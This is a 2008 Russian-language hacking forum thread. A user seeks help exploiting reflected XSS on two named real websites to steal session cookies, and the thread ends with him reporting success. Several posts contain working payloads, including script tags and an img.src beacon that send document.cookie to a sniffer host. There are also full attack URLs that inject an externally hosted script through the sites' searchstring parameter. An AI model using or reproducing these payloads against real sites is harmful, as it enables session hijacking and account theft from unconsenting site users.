Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Помогите разобраться с Xss (https://forum.antichat.xyz/showthread.php?t=69095)

AARON 02.05.2008 16:27

Помогите разобраться с Xss
 
Здравствуйте, товарисчи!

Помогите плз разобраться с XSS. Перечитал по инета... Не работает.

Значит проблема такова: нашел я туеву хучу сайтов с пассивными xss. Алерт есть, вроде нихрена не фильтруется...

Вот пару сайтов.

www.pit-pc.ru
www.softoman.ru

Зарегил сниффер на s.netsec.ru. Логин у меня там nick_314

составил соотв. запрос

<script>img = new Image(); img.src = "http://s.netsec.ru/Nick_314.gif?"+document.cookie;</script>

Сам перехожу по ссылке... По идее должен переходить мой sess_id, а вот хрен. Не пашет...

Переводил в char - не приходит... Просвятите ламера, что не так?

AARON 02.05.2008 16:37

Извините, перепутал раздел... Переместите , пожалуйста.

DimOnOID 04.05.2008 19:02

допустим на pit-pc.ru фильтурет ковычки....
сделай проще

http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT>

где содержание js.js
допустим такое
Код:

img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;

desTiny 04.05.2008 19:13

Цитата:

Сообщение от DimOnOID
допустим на pit-pc.ru фильтурет ковычки....

Цитата:

Сообщение от DimOnOID
http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT>

Ты странный :)...
searchstring="><

DimOnOID 04.05.2008 20:00

в код глянь...=\

AARON 04.05.2008 22:40

Спасибо большое, сейчас попробую.

AARON 04.05.2008 23:15

Значит попробовал. Результат - ноль...

ЗАрегился я по-быстренькому на Holm.ru
http://www.angryhacker.h18.ru

Залил Js.js

Цитата:

img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;
Делаю соотв. запрос

http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://www.angryhacker.h18.ru/js.js></SCRIPT>

Не работает. Грешу на holm.ru...

Qwazar 05.05.2008 00:14

Nick_314 - с большой или маленькой буквы? Просто захожу на http://s.netsec.ru/nick_314.gif - там ничего нет.

DimOnOID 05.05.2008 00:50

:) Проверь ещё раз всё хорошенько)..всё должно работать)......ну на крайний зарегай на tu1.ru )

AARON 06.05.2008 15:08

Все, разобрался. Теперь работает. Как выяснилось, логин nick_314 почему-то не работал... Я просто зарегил новый и теперь все тип-топ!

Спасибо за помошь, можно закрывать.


Время: 00:14